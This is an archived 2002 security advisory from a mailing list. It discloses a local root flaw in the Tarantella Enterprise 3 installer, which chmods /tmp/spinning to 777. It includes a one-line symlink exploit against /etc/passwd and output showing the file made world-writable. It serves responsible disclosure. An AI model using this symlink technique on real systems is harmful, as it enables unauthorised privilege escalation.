OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Larry W. Cashdollar (lwcvapid.dhs.org)
Date: Tue Feb 19 2002 - 07:22:55 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

                            Larry W. Cashdollar
                                Vapid Labs
                                2/18/2002

    Another local root vulnerability during installation of Tarantella
    Enterprise 3.

    During installation a "twirling / \ | - " text graphic is displayed (you
    remember them from the shareware games in DOS days..) they create a file
    in /tmp called spinning to determine at what state the installation is at.
    The files permissions are changed toread write excute for all, removed and
    recreated during different stages of the installation. It is vulnerabile to
    a simple symlink attack.

    Problem Code:
    <----snip---->
    touch /tmp/spinning >/dev/null 2>&1
    chmod 777 /tmp/spinning >/dev/null 2>&1
    <----snip---->

    Exploit:
    There is no race condition here, just create the link.

    [lwcmisery] ln -s /etc/passwd /tmp/spinning

    Wait until root is done installing...

    [lwcmisery] ls -l /etc/passwd
    - -rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd

    Recommendations:
    I again recommend the target system is running in single user mode before this
    software is installed.

    The vendor has been notified and plans to fix this in the next release.

    http://vapid.dhs.org
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (FreeBSD)
    Comment: For info see http://www.gnupg.org

    iD8DBQE8clFP1hSQ6Gxh/KoRAtQWAKCOod+43+rYbvc0pmw2ZnPZ5pDsqwCcD18m
    w80GBUP5ejW31415uXSVmGg=
    =U3gs
    -----END PGP SIGNATURE-----